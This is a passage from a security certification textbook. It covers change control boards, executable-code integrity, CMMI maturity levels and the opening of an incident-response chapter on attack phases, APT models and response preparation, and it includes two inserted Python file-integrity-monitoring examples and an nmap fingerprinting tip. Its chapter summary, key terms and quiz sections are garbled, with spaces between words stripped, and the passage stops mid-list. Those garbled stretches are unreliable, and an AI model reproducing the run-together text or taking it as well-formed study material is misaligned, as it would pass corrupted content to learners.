One of the key elements of a change plan is a comprehensive backout plan. If in the course of a planned change activity in production a problem occurs that prevents going forward, it is essential to have a backout plan to restore the system to its previous operating condition. A common element in many operating system updates is the inability to go back to a previous version. This is fine provided that the update goes perfectly, but if for some reason it fails, what then? For a personal device, there may be some inconvenience. For a server in production, this can have significant business implications. The ultimate in backout plans is the restoration of a complete backup of the system. Backups can be time consuming and difficult in some environments, but the spread of virtualization into the enterprise provides many more options in configuration management and backout plans.
The Purpose of a Change Control Board
To oversee the change management process, most organizations establish a change control board (CCB). In practice, a CCB not only facilitates adequate management oversight, but also facilitates better coordination between projects. The CCB convenes on a regular basis, usually weekly or monthly, and can be convened on an emergency or as-needed basis as well. Figure 21.2 shows the process for implementing and properly controlling hardware or software during changes.
• Figure 21.2 Change control board process
The CCB's membership should consist of development project managers, network administrators, system administrators, test/QA managers, an information security manager, an operations center manager, and a help desk manager. Others can be added as necessary, depending on the size and complexity of the organization.
Tech Tip
Incident Management
The ITIL v3 Glossary defines incident management as "The process responsible for managing the lifecycle of all incidents. The primary objective of incident management is to return the IT service to users as quickly as possible."
A system problem report (SPR) is used to track changes through the CCB. The SPR documents changes or corrections to a system. It reflects who requested the change and why, what analysis must be done and by whom, and how the change was corrected or implemented. Figure 21.3 shows a sample SPR. Most large enterprises cannot rely on a paper-based SPR process and instead use one of the many software systems available to perform change management functions. While this example shows a paper-based SPR, it contains all the elements of change management: it describes the problem and who reported it, it outlines resolution of the problem, and it documents approval of the change.
• Figure 21.3 Sample system problem report
Figure 21.4 shows the entire change management process and its relationship to incident management and release management.
• Figure 21.4 Change, incident, and release management
Code Integrity
One key benefit of adequate change management is the assurance of code consistency and integrity. Whenever a modified program is moved to the production source-code library, the executable version should also be moved to the production system. Automated change management systems greatly simplify this process and are therefore better controls for ensuring executable and source-code integrity. Remember that at no time should the user or application developer have access to production source and executable code libraries in the production environment. Finally, in today's networked environment, the integrity of the executable code is critical. A common hacking technique is to replace key system executable code with modified code that contains backdoors, allowing unauthorized access or functions to be performed. Executable code integrity can be verified using host-based intrusion detection systems (the function is often called file integrity monitoring). These systems create and maintain a database of the size and content of executable modules. Conceptually, this is usually done by performing a cryptographic hash (a simple checksum is not enough, because an attacker can adjust a modified file until its checksum matches) on the executable modules and storing the results in a database. The operation is performed on a regular schedule against the executable modules, and the results are compared to the database to identify any unauthorized changes that may have occurred to the executable modules. The database itself must be protected from modification, for example by storing it read-only or off the monitored host; an attacker who can replace a binary and also rewrite its stored hash defeats the check.
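What such a host-based integrity check does, as an added Python example (not code from the book or from any intrusion detection product): fingerprint every executable under a directory with its size and SHA-256 digest, seal the resulting database with an HMAC so that tampering with the database is itself detectable, then rescan and report modified, added and removed files. The "executables" are small constructed files written to a temporary directory, the HMAC key is a constructed constant (in practice it would live off the monitored host), and all function names are my own.

```python
"""Executable integrity checking in the manner of a host-based IDS / file
integrity monitor: record size and SHA-256 of every executable, seal the
database with an HMAC so tampering with the database itself is detected,
then rescan and report changes. Added example, not code from the book or
any product; the 'executables' are small constructed files in a temp dir."""
import hashlib
import hmac
import json
import os
import tempfile
from typing import Dict, List

Record = Dict[str, object]          # {"size": int, "sha256": hex string}
Database = Dict[str, Record]        # relative path -> record


def fingerprint(path: str) -> Record:
    """Size and SHA-256 digest of one file, read in chunks. A plain checksum
    would not do: an attacker can pad a trojan to match a CRC or length."""
    digest = hashlib.sha256()
    size = 0
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
            size += len(chunk)
    return {"size": size, "sha256": digest.hexdigest()}


def build_database(root: str) -> Database:
    """Fingerprint every regular file under root, keyed by relative path."""
    db: Database = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            db[rel] = fingerprint(full)
    return db


def seal(db: Database, key: bytes) -> str:
    """HMAC-SHA256 over the canonical JSON form of the database. Keep the key
    (or the whole database) off-host or read-only: an attacker who can replace
    a binary and also rewrite the database defeats the check."""
    canonical = json.dumps(db, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()


def verify_seal(db: Database, key: bytes, expected: str) -> bool:
    return hmac.compare_digest(seal(db, key), expected)


def compare(baseline: Database, current: Database) -> Dict[str, List[str]]:
    """Unauthorized changes relative to the sealed baseline."""
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "removed": removed}


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline three files, then replace one with a
    same-size 'backdoored' copy, drop in a new file, delete another, rescan."""
    key = b"constructed-demo-key-keep-off-host"
    with tempfile.TemporaryDirectory() as root:
        files = {"bin/login": b"login v1", "bin/sshd": b"sshd v1", "sbin/init": b"init v1"}
        for rel, body in files.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(body)
        baseline = build_database(root)
        mac = seal(baseline, key)

        with open(os.path.join(root, "bin", "login"), "wb") as f:
            f.write(b"login v2")          # same size, different content
        with open(os.path.join(root, "bin", "rootkit"), "wb") as f:
            f.write(b"evil")
        os.remove(os.path.join(root, "sbin", "init"))

        if not verify_seal(baseline, key, mac):
            raise RuntimeError("baseline database has been tampered with")
        return compare(baseline, build_database(root))


def demo_tampered_database() -> bool:
    """An attacker who edits the database to match a replaced binary is caught
    by the seal. Returns True when the tampering is detected."""
    key = b"constructed-demo-key"
    db: Database = {"bin/login": {"size": 8, "sha256": "a" * 64}}
    mac = seal(db, key)
    db["bin/login"]["sha256"] = "b" * 64
    return not verify_seal(db, key, mac)


if __name__ == "__main__":
    print(demo())
    print("tampered database detected:", demo_tampered_database())
```

The same-size replacement in `demo` is the reason size alone is never the test: only the digest separates `login v1` from `login v2`. In a real deployment the baseline is rebuilt and re-sealed only as part of an approved change, so a legitimate patch is the one event that should move a file from "modified" back to baseline.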
The Capability Maturity Model Integration
An important set of process models is the Capability Maturity Model Integration (CMMI) series developed at Carnegie Mellon University's Software Engineering Institute (SEI). SEI has created three capability maturity model integrations that replace the older Capability Maturity Model (CMM): the Capability Maturity Model Integration for Acquisition (CMMI-ACQ), the Capability Maturity Model Integration for Development (CMMI-DEV), and the Capability Maturity Model Integration for Services (CMMI-SVC). CMMI-DEV is representative of the three models. One of the fundamental concepts of CMMI-DEV is configuration or change management, which provides organizations with the ability to improve their software and other processes by providing an evolutionary path from ad hoc processes to disciplined management processes. The CMMI-DEV defines five maturity levels:
Level 1: Initial At maturity level 1, processes are generally ad hoc and chaotic. The organization does not provide a stable environment to support processes.
Level 2: Managed At maturity level 2, processes are planned and executed in accordance with policy. The projects employ skilled people who have adequate resources to produce controlled outputs; involve relevant stakeholders; are monitored, controlled, and reviewed; and are evaluated for adherence to their process descriptions.
Level 3: Defined At maturity level 3, processes are well characterized and understood, and are described in standards, procedures, tools, and methods. These standard processes are used to establish consistency across the organization.
Level 4: Quantitatively Managed At maturity level 4, the organization establishes quantitative objectives for quality and process performance and uses them as criteria in managing projects. Quantitative objectives are based on the needs of the customer, end users, organization, and process implementers. Quality and process performance is understood in statistical terms and is managed throughout the life of projects.
Level 5: Optimizing At maturity level 5, an organization continually improves its processes based on a quantitative understanding of its business objectives and performance needs. The organization uses a quantitative approach to understanding the variation inherent in the process and the causes of process outcomes.
Exam Tip: To complete your preparations for the CompTIA Security+ exam, it is recommended that you consult SEI's website (www.sei.cmu.edu) for specific CMMI definitions. Be sure that you understand the differences between capability levels and maturity levels as defined in CMMI.
Change management is a key process to implementing the CMMI-DEV in an organization. For example, if an organization is at CMMI-DEV level 1, it probably has minimal formal change management processes in place. At level 3, an organization has a defined change management process that is followed consistently. At level 5, the change management process is a routine, quantitatively evaluated part of improving software products and implementing innovative ideas across the organization. For an organization to manage software development, operation, and maintenance, it should have effective change management processes in place.
Change management is an essential management tool and control mechanism. The concept of segregation of duties ensures that no single individual or organization possesses too much control in a process, helping to prevent errors and fraudulent or malicious acts. The elements of change management—configuration identification, configuration control, configuration status accounting, and configuration auditing—coupled with a defined process and a change control board, will provide management with proper oversight of the software life cycle. Once such a process and management oversight exist, the company can use CMMI-DEV to move from ad hoc activities to a disciplined software management process.
Chapter21Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutchangemanagement.
Usechangemanagementasanimportantenterprisemanagementtool
Changemanagementshouldbeusedinallphasesofthesoftwarelifecycle.
Changemanagementcanbescaledtoeffectivelycontrolandmanagesoftwaredevelopmentandmaintenance.
Changemanagementcanpreventsomeofthemostcommonsoftwaredevelopmentandmaintenanceproblems.
Institutethekeyconceptofseparationofduties
Separationofdutiesensuresthatnosingleindividualororganizationpossessestoomuchcontrolinaprocess.
Separationofdutieshelpspreventerrorsandfraudulentormaliciousacts.
Separationofdutiesestablishesabasisforaccountabilityandcontrol.
Separationofdutiescanhelpsafeguardenterpriseassetsandprotectagainstrisks.
Identifytheessentialelementsofchangemanagement
Configurationidentificationidentifiesassetsthatneedtobecontrolled.
Configurationcontrolkeepstrackofchangestoconfigurationitemsthathavebeenbaselined.
Configurationstatusaccountingtrackseachconfigurationiteminthebaseline.
Configurationauditingverifiestheconfigurationitemsarebuiltandmaintainedappropriately.
Implementchangemanagement
Astandardizedprocessandachangecontrolboardprovidemanagementwithproperoversightandcontrolofthesoftwaredevelopmentlifecycle.
Agoodchangemanagementprocesswillexhibitgoodseparationofdutiesandhaveclearlydefinedroles,responsibilities,andapprovals.
Aneffectivechangecontrolboardfacilitatesgoodmanagementoversightandcoordinationbetweenprojects.
UsetheconceptsoftheCapabilityMaturityModelIntegration
Oncepropermanagementoversightexists,thecompanywillbeabletouseCMMItohelptheorganizationmovefromadhocactivitiestoadisciplinedsoftwaremanagementprocess.
CMMIreliesheavilyonchangemanagementtoprovideorganizationswiththecapabilitytoimprovetheirsoftwareprocesses.
KeyTermsbaseline(639)CapabilityMaturityModelIntegration(CMMI)(644)changecontrolboard(CCB)(642)changemanagement(635)computersoftwareconfigurationitems(639)configurationauditing(640)configurationcontrol(640)configurationidentification(639)configurationitems(639)configurationmanagement(635)configurationstatusaccounting(640)separationofduties(637)systemproblemreport(SPR)(643)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.The_______________isthebodythatprovidesoversighttothechangemanagementprocess.
2._______________isastandardmethodologyforperformingand
recordingchangesduringsoftwaredevelopmentandoperation.
3._______________istheprocessofassigningresponsibilitiestodifferentindividualssuchthatnosingleindividualcancommitfraudulentormaliciousactions.
4.Proceduresfortrackingandmaintainingdatarelativetoeachconfigurationiteminthebaselineare_______________.
5.A_______________describesasystemasitisbuiltandfunctioningatapointintime.
6.Astructuredmethodologythatprovidesanevolutionarypathfromadhocprocessestodisciplinedsoftwaremanagementisthe_______________.
7.Theprocessofverifyingthatconfigurationitemsarebuiltandmaintainedaccordingtorequirements,standards,orcontractualagreementsis_______________.
8.Thedocumentusedbythechangecontrolboardtotrackchangestosoftwareiscalleda_______________.
9.Whenyouidentifywhichassetsneedtobemanagedandcontrolled,youareperforming_______________.
10._______________istheprocessofcontrollingchangestoitemsthathavebeenbaselined.
Multiple-ChoiceQuiz1.Whyshoulddevelopersandtestersavoidusing“live”production
datatoperformvarioustestingactivities?
A.Theuseof“live”productiondataensuresafullandrealistictestdatabase.
B.Theuseof“live”productiondatacanjeopardizetheconfidentialityandintegrityoftheproductiondata.
C.Theuseof“live”productiondataensuresanindependentandobjectivetestenvironment.
D.Developersandtestersshouldbeallowedtouse“live”productiondataforreasonsofefficiency.
2.Softwarechangemanagementproceduresareestablishedto:A.Ensurecontinuityofbusinessoperationsintheeventofa
naturaldisaster
B.Addstructureandcontroltothedevelopmentofsoftwaresystems
C.Ensurechangesinbusinessoperationscausedbyamanagementrestructuringareproperlycontrolled
D.Identifythreats,vulnerabilities,andmitigatingactionsthatcouldimpactanenterprise
3.Whichofthefollowingcorrectlydefinestheprincipleofleastprivilege?
A.Accessprivilegesarereviewedregularlytoensurethatindividualswhonolongerrequireaccesshavehadtheirprivilegesremoved.
B.Authorizationofasubject’saccesstoanobjectdependsonsensitivitylabels.
C.Theadministratordetermineswhichsubjectscanhaveaccesstocertainobjectsbasedonorganizationalsecuritypolicy.
D.Usershavenomoreprivilegesthanarenecessarytoperformtheirjobs.
4.Whichofthefollowingdoesnotadheretotheprinciplesofseparationofduties?
A.Softwaredevelopment,testing,qualityassurance,and
productionshouldbeassignedtothesameindividuals.
B.Softwaredevelopersshouldnothaveaccesstoproductiondataandsource-codefiles.
C.Softwaredevelopersandtestersshouldberestrictedfromaccessing“live”productiondata.
D.Thefunctionsofcreating,installing,andadministratingsoftwareprogramsshouldbeassignedtodifferentindividuals.
5.Configurationauditingis:A.Theprocessofcontrollingchangestoitemsthathavebeen
baselined
B.Theprocessofidentifyingwhichassetsneedtobemanagedandcontrolled
C.Theprocessofverifyingthattheconfigurationitemsarebuiltandmaintainedproperly
D.Theproceduresfortrackingandmaintainingdatarelativetoeachconfigurationiteminthebaseline
6.Whyshouldendusersnotbegivenaccesstoprogramsourcecodes?A.Itcouldallowanendusertoidentifyweaknessesorerrorsin
thesourcecode.
B.Itensuresthattestingandqualityassuranceperformtheirproperfunctions.
C.Itassistsinensuringanindependentandobjectivetestingenvironment.
D.Itcouldallowanendusertoexecutethesourcecode.
7. Configuration control is:
A. The process of controlling changes to items that have been baselined
B. The process of identifying which assets need to be managed and controlled
C. The process of verifying that the configuration items are built and maintained properly
D. The procedures for tracking and maintaining data relative to each configuration item in the baseline
8. Configuration identification is:
A. The process of verifying that the configuration items are built and maintained properly
B. The procedures for tracking and maintaining data relative to each configuration item in the baseline
C. The process of controlling changes to items that have been baselined
D. The process of identifying which assets need to be managed and controlled
9. Which position is responsible for approving the movement of executable code to the production system?
A. System administrator
B. Developer
C. Manager
D. Quality assurance
10. The purpose of a change control board (CCB) is to:
A. Facilitate management oversight and better project coordination
B. Identify which assets need to be managed and controlled
C. Establish software processes that are structured enough that success with one project can be repeated for another similar project
D. Track and maintain data relative to each configuration item in the baseline
Essay Quiz
1. You are the project manager for a new web-based online shopping system. Due to market competition, your management has directed you to go live with your systems one week earlier than originally scheduled. One member of your development team is a sharp, smart programmer with less than one year of experience. He asks you why your team is required to follow what he calls cumbersome, out-of-date change management procedures. What would you tell him?
2. Explain why the change management principles discussed in this chapter should be used when managing operating system patches.
3. Explain why a database administrator (DBA) should not be allowed to develop programs on the systems they administer.
4. Your company has just decided to follow the Capability Maturity Model Integration. You manage a development shop of 15 programmers with four team leaders. You and your team have determined that you are currently at CMMI-DEV level 1, Initial. Describe the actions you might take to move your shop to level 3, the Defined maturity level.
5. You have just been made Director of E-commerce Applications, responsible for over 30 programmers and ten major software projects. Your projects include multiple web pages on ten different production servers, system security for those servers, three development servers, three test/QA servers, and some third-party software. Which of those resources would you place under change management practices and why?
Lab Projects
• Lab Project 21.1 Using a typical IT organization from a medium-sized company (100 developers, managers, and support personnel), describe the purpose, organization, and responsibilities of a change control board appropriate for this organization.
• Lab Project 21.2 You are the IT staff auditor for the company mentioned in the first lab project. You have reviewed the change control board processes and found they have instituted the following change management process. Describe two major control weaknesses in this particular change management process. What would you do to correct these control weaknesses?
Chapter 22 Incident Response
Bad guys will follow the rules of your network to accomplish their mission.
—RON SCHAFFER, SANS INCIDENT DETECTION SUMMIT
In this chapter, you will learn how to
• Understand the foundations of incident response processes
• Implement the detailed steps of an incident response process
• Describe standards and best practices that are involved in incident response

Incident response is becoming the new norm in security operations. The new reality is that keeping adversaries off your network and preventing unauthorized activity is not going to provide the level of security the enterprise requires. This means that the system needs to be able to operate in a state of compromise, yet still achieve the desired security objectives. The mindset has to change from preventing intrusion and attack to preventing loss. This chapter explores the use of an incident response function to achieve the goals of minimizing loss under all operating conditions. This will mean a shift in focus, and a change in priorities as well as security strategy. These efforts can only succeed on top of a solid foundation of security fundamentals as presented earlier in the book, so this is not a starting place, but rather the next step in the evolution of defense.
Foundations of Incident Response
A successful incident response effort requires two components: knowledge of one’s own systems and knowledge of the adversary. The ancient warrior/philosopher Sun Tzu explains it well in The Art of War: “If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”
An incident is any event in an information system or network where the results are different than normal. Incident response is not just an information security operation. Incident response is an effort that involves the entire business. The security team may form a nucleus of the effort, but the key tasks are performed by many parts of the business. Incident response is a term used to describe the steps an organization performs in response to any situation determined to be abnormal in the operation of a computer system. The causes of incidents are many, from the environment (storms), to errors on the part of users, to unauthorized actions by unauthorized users, to name a few. Although the causes may be many, the results can be classified into classes. A low-impact incident may not result in any significant risk exposure, so no action other than repairing the broken system is needed. A moderate-risk incident will require greater scrutiny and response efforts, and a high-level risk exposure incident will require the greatest scrutiny. To manage incidents when they occur, a table of guidelines for the incident response team needs to be created to assist in determining the level of response. Two major elements play a role in determining the level of response.

Information criticality is the primary determinant, and this comes from the data classification and the quantity of data involved. Information criticality is defined as the relative importance of specific information to the business. Information criticality is a key measure used in the prioritization of actions throughout the incident response process. The loss of one administrator password is less serious than the loss of all of them. The second major element involves a business decision on how this incident plays into current business operations. A series of breaches, whether minor or not, indicates a pattern that can have public relations and regulatory issues. Once an incident happens, it is time to react, and proper reaction requires a game plan. Contrary to what many want to believe, there are no magic silver bullets to kill the security demons. What is required is a solid, well-rehearsed incident response plan. This plan is custom-tailored to the information criticalities, the actual hardware and software architectures, and the people. Like all large, complex projects, the challenges rapidly become organizational in nature—budget, manpower, resources, and commitment.
Incident Management
CERT is a trademark of Carnegie Mellon, and is frequently used in some situations, such as the US-CERT.
Having an incident response management methodology is a key risk mitigation strategy. One of the steps that should be taken to establish a plan to handle business interruptions as a result of a cyber event of some sort is the establishment of a Computer Incident Response Team (CIRT) or a Computer Emergency Response Team (CERT). The organization’s CIRT will conduct the investigation into the incident and make the recommendations on how to proceed. The CIRT should consist of not only permanent members but also ad hoc members who may be called upon to address special needs depending on the nature of the incident. In addition to individuals with a technical background, the CIRT should include nontechnical personnel to provide guidance on ways to handle media attention, legal issues that may arise, and management issues regarding the continued operation of the organization. The CIRT should be created and team members should be identified before an incident occurs. Policies and procedures for conducting an investigation should also be worked out in advance of an incident occurring. It is also advisable to have the team periodically meet to review these procedures.
Anatomy of an Attack
Attackers have a method by which they attack a system. Although the specifics may differ from event to event, there are some steps that are commonly employed. There are numerous types of attacks, from old-school hacking to the new advanced persistent threat (APT) attack. The differences are subtle and are related to the objectives of each form of attack.
Old School
Attacks are not a new phenomenon in enterprise security, and a historical examination of large numbers of attacks shows some common methods. These are the traditional steps:
1. Footprinting
2. Scanning
3. Enumeration
4. Gain access
5. Escalate privilege
6. Pilfer
7. Create backdoors
8. Cover tracks
9. Denial of service (DOS)
Tech Tip
Using nmap to Fingerprint an Operating System
To use nmap to fingerprint an operating system, use the –O option:
nmap -O -v scanme.nmap.org
This command performs a scan of interesting ports on the target (scanme.nmap.org) and attempts to identify the operating system. The –v option indicates that you want verbose output.
Footprinting is the determination of the boundaries of a target space. There are numerous sources of information, including websites, DNS records, and IP address registrations. Understanding the boundaries assists an attacker in knowing what is in their target range and what isn’t. Scanning is the examination of machines to determine what operating systems, services, and vulnerabilities exist. The enumeration step is a listing of the systems and vulnerabilities to build an attack game plan. The first actual incursion is the gaining of access to an account on the system, almost always an ordinary user, as higher-privilege accounts are harder to target. The next step is to gain access to a higher-privilege account. From a higher-privilege account, the range of accessible activities is greater, including pilfering files, creating backdoors so you can return, and covering your tracks by erasing logs. The detail associated with each step may vary from hack to hack, but in most cases, these steps were employed in this manner to achieve an objective.
Advanced Persistent Threat
A relatively new attack phenomenon has been labeled the advanced persistent threat. An advanced persistent threat (APT) is an attack that always maintains a primary focus on remaining in the network, operating undetected, and having multiple ways in and out. APTs began with nation-state attackers, but the utility of the long-term attack has proven valuable, and many sophisticated attacks have moved to this route. Most APTs begin via a phishing or spear phishing attack, which establishes a foothold in the system under attack. From this foothold, the attack methodology is similar to the traditional attack method described in the previous section, but additional emphasis is placed on the steps needed to maintain a presence on a network:
1. Define target
2. Research target
3. Select tools
4. Test for detection
5. Initial intrusion
6. Establish outbound connection
7. Obtain credentials
8. Expand access
9. Strengthen foothold
10. Cover tracks
11. Exfiltrate data

The initial intrusion is usually performed via social engineering (spear phishing), over e-mail, using zero-day-based custom malware. Another popular infection method is the use of a watering hole attack, planting the malware on a website that the victim employees will likely visit. The use of custom malware makes detection of the attack by antivirus/malware programs a near impossibility. After the attackers gain access, they attempt to expand access and strengthen the foothold. This is done by planting remote administration Trojan (RAT) software in the victim’s network, creating network backdoors and tunnels allowing stealth access to its infrastructure. The next step, obtaining credentials and escalating privileges, is performed through the use of exploits and password cracking. The true objective is to acquire administrator privileges over a victim’s computer and ultimately expand it to Windows domain administrator accounts. One of the hallmarks of an APT attack is the emphasis on maintaining a presence on the system to ensure continued control over access channels and credentials acquired in previous steps. A common technique used is lateral movement across a network. Moving laterally allows an attacker to expand control to other workstations, servers, and infrastructure elements and perform data harvesting on them. Attackers also perform internal reconnaissance, collecting information on surrounding infrastructure, trust relationships, and information concerning the Windows domain structure.
Tech Tip
APT Attack Model
The computer security investigative firm Mandiant (now a division of FireEye) was one of the pioneers in the use of incident response techniques against APT-style attacks. They published a model of an APT attack to use as a guide:
1. Initial compromise
2. Establish foothold
3. Escalate privileges
4. Internal reconnaissance
5. Move laterally
6. Maintain presence
7. Complete mission
The key step is step 5, lateral movement. This is where the adversary traverses your network, using multiple accounts, and does so to discover material worth stealing as well as to avoid being locked out by normal operational changes. This is one element that can be leveraged to help slow down, detect, and defeat APT attacks. Blocking lateral movement can keep APT-style attacks from spreading through a network and limit their stealth.
Goals of Incident Response
The goals of an incident response process are multidimensional in nature:
• Confirm or dispel incident
• Promote accurate information accumulation
• Establish controls for evidence
• Protect privacy rights
• Minimize disruption to operations
• Allow for legal/civil recourse
• Provide accurate reports/recommendations
Incident response depends upon accurate information. Without it, the team risks following data in the wrong direction, missing crucial information, and finding only dead ends. The preceding goals are essential for the viability of an incident response process and the desired outcomes.
Incident Response Process
Incident response is the set of actions security personnel perform in response to a wide range of triggering events. These actions are vast and varied because they have to deal with a wide range of causes and consequences. Through the use of a structured framework, coupled with properly prepared processes, incident response becomes a manageable task. Without proper preparation, this task can quickly become impossible or intractably expensive. Incident response is the new business cultural norm in information security. The key is to design the procedures to include appropriate business personnel, not keep it as a pure information security endeavor. The challenges are many, including the aspect of timing as the activities quickly become a case of one group of professionals pursuing another.

Incident response is a multistep process with several component elements. The first is organization preparation, followed by system preparation. An initial detection is followed by initial response, then isolation, investigation, recovery, and reporting. There are additional process steps of follow-up and lessons learned, each of which is presented in following sections. Incident response is a key element of a security posture and must involve many different aspects of the business to properly respond. This is best built upon the foundation of a comprehensive incident response policy that details the roles and responsibilities of the organizational elements with respect to the process elements detailed in this chapter.
Tech Tip
Incident Response Defined
NIST Special Publication 800-61 defines an incident as the act of violating an explicit or implied security policy. This violation can be intentional, incidental, or accidental, with causes being wide and varied in nature. These include but are not limited to the following:
• Attempts (either failed or successful) to gain unauthorized access to a system or its data
• Unwanted disruption or denial of service
• The unauthorized use of a system for the processing or storage of data
• Changes to system hardware, firmware, or software characteristics without the owner’s knowledge, instruction, or consent
• Environmental changes that result in data loss or destruction
• Accidental actions that result in data loss or destruction
Preparation
The old adage that “those who fail to prepare, prepare to fail” certainly applies to incident response. Without advance preparation, an organization’s response to a security incident will be haphazard and ineffective. Establishing the processes and procedures to follow in advance of an event is critical.
Incident response efforts begin before an incident occurs—that is, before “something goes wrong.” Preparing for an incident is the first phase. The organization needs to establish the steps to be taken when an incident is discovered (or suspected); determine points of contact; train all employees and security professionals so they understand the steps to take and who to call; establish an incident response team; acquire the equipment necessary to detect, contain, and recover from an incident; establish the procedures and guidelines for the use of the equipment obtained; and train those who will use the equipment. During this phase, general user training in areas such as social engineering should be accomplished, as well as any additional specialized training in areas such as computer forensics that is determined to be necessary.
Organization Preparation
Preparing an organization requires a plan, both for the initial effort and for maintenance of that effort. Over time, the organization shifts based on business objectives, personnel change, business efforts and focus change, new programs, new capabilities; virtually any change can necessitate shifts in the incident response activities. At a minimum, the following items should be addressed and periodically reviewed in terms of incident response preparation:
• Develop and maintain comprehensive incident response policies and procedures
• Establish and maintain an Incident Response Team
• Obtain top-level management support
• Agree to ground rules/rules of engagement
• Develop scenarios and responses
• Develop and maintain an incident response toolkit
    • System plans and diagrams
    • Network architectures
    • Critical asset lists
• Practice response procedures
    • Fire drills
    • Scenarios (“Who do you call?”)
System Preparation
Systems require preparation for effective incident response efforts. Incident responders are dependent upon documentation for understanding hardware, software, and network layouts. Understanding how access control is employed, including specifics across all systems, is key when determining who can do what—a common incident response question. Understanding the logging methodology and architecture will make incident response data retrieval easier. All of these questions should be addressed in planning of diagrams, access control, and logging, to ensure that these critical security elements are capturing the correct information before an incident.
Tech Tip
Preparing for Incident Detection
To ensure that discovering incidents is not an ad hoc, hit-or-miss proposition, the organization needs to establish procedures that describe the process administrators must follow to monitor for possible security events. The tools for accomplishing this task are identified during the preparation phase, as well as any required training. The procedures governing the monitoring tools used should be established as part of the specific guidelines governing the use of the tools but should include references to the incident response policy.
Having lists of critical files and their hash values, all stored offline, can make system investigation a more efficient process. In the end, when architecting a system, taking the time to plan for incident response processes will be crucial to a successful response once an incident occurs. Preparing systems for incident response is similar to preparing them for maintainability, so these efforts can yield regular dividends to the system owners. Determining the steps to isolate specific machines and services can be a complex endeavor, and is one best accomplished before an incident, through the preparation phase.
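The offline list of critical files and their hash values described above, worked as an added example that is not the book's own code: it builds a SHA-256 baseline during preparation, writes it out as JSON (an assumed format), and during investigation reports which files changed or disappeared. The file names and contents are constructed for the demonstration.

```python
"""Critical-file hash baseline stored offline, then verified after an incident.

Added example, not the book's own code. Assumes SHA-256 digests and a JSON
baseline file; the file names and contents below are constructed stand-ins.
"""
from __future__ import annotations

import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 65536) -> str:
    """Hash a file in chunks so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path, critical: list[str]) -> dict[str, str]:
    """Map each critical file (path relative to root) to its SHA-256 digest."""
    return {rel: sha256_file(root / rel) for rel in critical}


def save_baseline(baseline: dict[str, str], dest: Path) -> None:
    """Write the baseline as JSON; in practice dest is offline or read-only media."""
    dest.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(src: Path) -> dict[str, str]:
    return json.loads(src.read_text())


def verify_against_baseline(root: Path, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Compare live files with the offline baseline.

    Returns three sorted lists: files whose digest still matches, files whose
    content changed, and files that are no longer present. Entries in the
    last two lists are leads for the investigator, not proof of compromise.
    """
    result: dict[str, list[str]] = {"ok": [], "modified": [], "missing": []}
    for rel, expected in sorted(baseline.items()):
        path = root / rel
        if not path.is_file():
            result["missing"].append(rel)
        elif sha256_file(path) != expected:
            result["modified"].append(rel)
        else:
            result["ok"].append(rel)
    return result


def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline three files, then weaken one and delete another."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Constructed stand-ins for critical files (contents are placeholders)
        files = {
            "etc/passwd": "root:x:0:0:root:/root:/bin/bash\n",
            "etc/ssh/sshd_config": "PermitRootLogin no\nPasswordAuthentication no\n",
            "usr/bin/login": "placeholder for a binary\n",
        }
        for rel, content in files.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(content)

        # Preparation phase: build the baseline and store it off the host
        # (kept in the same temporary directory only so this demo is self-contained)
        offline_copy = root / "baseline-offline.json"
        save_baseline(build_baseline(root, list(files)), offline_copy)

        # Simulated incident: sshd configuration weakened, login binary removed
        (root / "etc/ssh/sshd_config").write_text("PermitRootLogin yes\n")
        (root / "usr/bin/login").unlink()

        # Investigation phase: compare the live system with the offline list
        return verify_against_baseline(root, load_baseline(offline_copy))


if __name__ == "__main__":
    for status, names in demo().items():
        print(f"{status:9s} {', '.join(names) or '-'}")
```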
Researching Vulnerabilities
After the hacker has a list of software running on the systems, he will start researching the Internet for vulnerabilities associated with that software. Numerous websites provide information on vulnerabilities in specific application programs and operating systems. Understanding how hackers navigate systems is important, for system administrators and security personnel can use the same steps to research potential vulnerabilities before a hacker strikes. This information is valuable to administrators who need to know what problems exist and how to patch them.
Incident Response Team
Establishing an incident response team is an essential step in the preparation phase. Although the initial response to an incident may be handled by an individual, such as a system administrator, the complete handling of an incident typically takes an entire team. An incident response team is a group of people that prepares for and responds to any emergency incident, such as a natural disaster or an interruption of business operations. A computer security incident response team in an organization typically includes key skilled members who bring a wide range of skills to bear in the response effort. Incident response teams are common in corporations as well as in public service organizations. Incident response team members ideally are trained and prepared to fulfill the roles required by the specific situation (for example, to serve as incident commander in the event of a large-scale public emergency). Incident response teams are frequently dynamically sized to the scale and nature of an incident, and as the size of an incident grows and as more resources are drawn into the event, the command of the situation may shift through several phases. In a small-scale event, or in the case of a small firm, usually only a volunteer or ad hoc team may exist to respond. In cases where the incident spreads beyond the local control of the incident response team, higher-level resources through industry groups and government groups exist to assist in the incident. Advanced preparation in the form of contacting and establishing working relations with higher-level groups is an important preparation step.

The incident response team is a critical part of the incident response plan. Team membership will vary depending on the type of incident or suspected incident, but may include the following members:
• Team lead
